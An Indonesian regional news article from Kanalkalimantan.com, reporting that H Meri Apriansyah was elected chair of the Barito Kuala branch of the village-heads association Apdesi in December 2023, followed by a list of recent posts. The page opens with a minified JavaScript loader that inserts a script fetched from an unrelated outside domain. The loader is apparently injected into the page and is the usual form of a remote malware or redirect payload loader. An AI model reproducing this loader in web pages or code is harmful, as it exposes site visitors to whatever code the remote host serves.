(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Barito Kuala

Muscablub Tetapkan H Meri Apriansyah sebagai Ketua DPC Apdesi Batola


KANALKALIMANTAN.COM, MARABAHAN – Sempat vackum sekitar 2 tahun, Asosiasi Pemerintah Desa Seluruh Indonesia (Apdesi) Kabupaten Barito Kuala (Batola) akhirnya menggelar Musyawarah Cabang Luar Biasa (Muscablub) 2023 untuk memilih Ketua DPC Apdesi Batola yang baru.

Muscablub yang digelar Sabtu (16/12/2023) siang, di Gedung Griya Pasadena, Kayu Tangi Banjarmasin, diikuti 121 Kepala Desa (Kades) dari 195 Kades yang ada di Kabupaten Batola.

Saat pelaksanaan Muscablub, Panitia pemilihan Ketua DPC Apdesi Kabupaten Barito Kuala awalnya menerima 3 calon kandidat. Ketiga kandidat tersebut antara lain H Meri Apriansyah, Syarifah Saufiah, dan Siti Khadijah.

Baca juga: Cerita Dua Produser Film “Ancika 19955” dan “Saranjana Kota”, Industri Perfilman Kalsel Cerah

Setelah dilakukan voting atau pemungutan suara, nomor urut satu H Meri Apriansyah memperoleh suara terbanyak.yakni 95 suara. Kemudian disusul nomor urut dua Syarifah Saufiah dengan 12 suara, dan nomor urut tiga Siti Khadijah sebanyak 2 suara.

Berdasarkan suara terbanyak, H Meri Apriansyah akhirnya terpilih dan ditetapkan sebagai Ketua DPC Apdesi di Musyawarah Cabang Luar Biasa Apdesi Kabupaten Barito Kuala 2023.

Seusai pemilihan Ketua DPC Apdesi Kabupaten Batola H Meri Apriansyah berterima kasih kepada seluruh Kades yang telah memberikan dirinya kepercayaan untuk memimpin Apdesi Batola.

Kades Tatah Mesjid, Kecamatan Alalak ini berjanji akan memimpin Apdesi Batola dengan baik dan ingin memperjuangkan kesejahteraan Kades dan perangkat desa.

Baca juga: Tradisi Warga Kumpulkan Kayu Bakar untuk Isra Mi’raj dan Haul Sekumpul

“Insya Allah saya akan menjalankan tugas seperti yang sudah menjadi visi dan misi, yakni meningkatkan kesejahteraan kepala desa dan perangkat desa sekaligus meningkatkan pelayanan kepada masyarakat,” jelas H Meri Apriansyah.

Di bawah kepemimpinannya, Meri Apriansyah menyampaikan kesiapan Apdesi Batola untuk bersinergi dengan Pemkab Batola, Pemprov Kalsel, dan pemerintah pusat.

“Melalui Apdesi kami siap bekerjasama dengan pemerintah untuk meningkatkan kesejahteraan kepala desa dan perangkat desa,” tuturnya.

Terpisah Ketua DPD Apdesi Kalsel, Ahmad Rijali Nasution yang menghadiri proses Muscablub dan pemilihan Ketua DPC APDESI Kabupaten Batola berpesan kepada H Meri Apriansyah segera membentuk kepengurusan yang baru.

Baca juga: Apresiasi Resilience and Sustainability Industry Dorong Pelaku Industri Kurangi Emisi Karbon

Ia berharap agar Ketua Apdesi Batola terpilih untuk bisa melaksanakan tugas dan amanah dengan baik, serta mampu melaksanakan visi dan misinya.

“Kami berharap Ketua DPC Apdesi Batola terpilih bisa melaksanakan tugas dengan baik dan juga mampu menjalankan visi dan misinya,” ujar Ahmad Rijali Nasution.

Untung Khodari, panitia Muscablub menyampaikan bahwa berkat kerjasama yang baik pihaknya telah menjalankan tugas dengan lancar dan aman, hingga terpilih Ketua DPC Apdesi Batola yang baru.

“Alhamdulillah tugas kami melaksanakan acara Muscablub berjalan lancar, hingga terpilih Ketua DPC Apdesi Batola H Meri Apriansyah,” pungkasnya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

3 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

4 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

5 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

6 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

6 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

7 jam ago

This website uses cookies.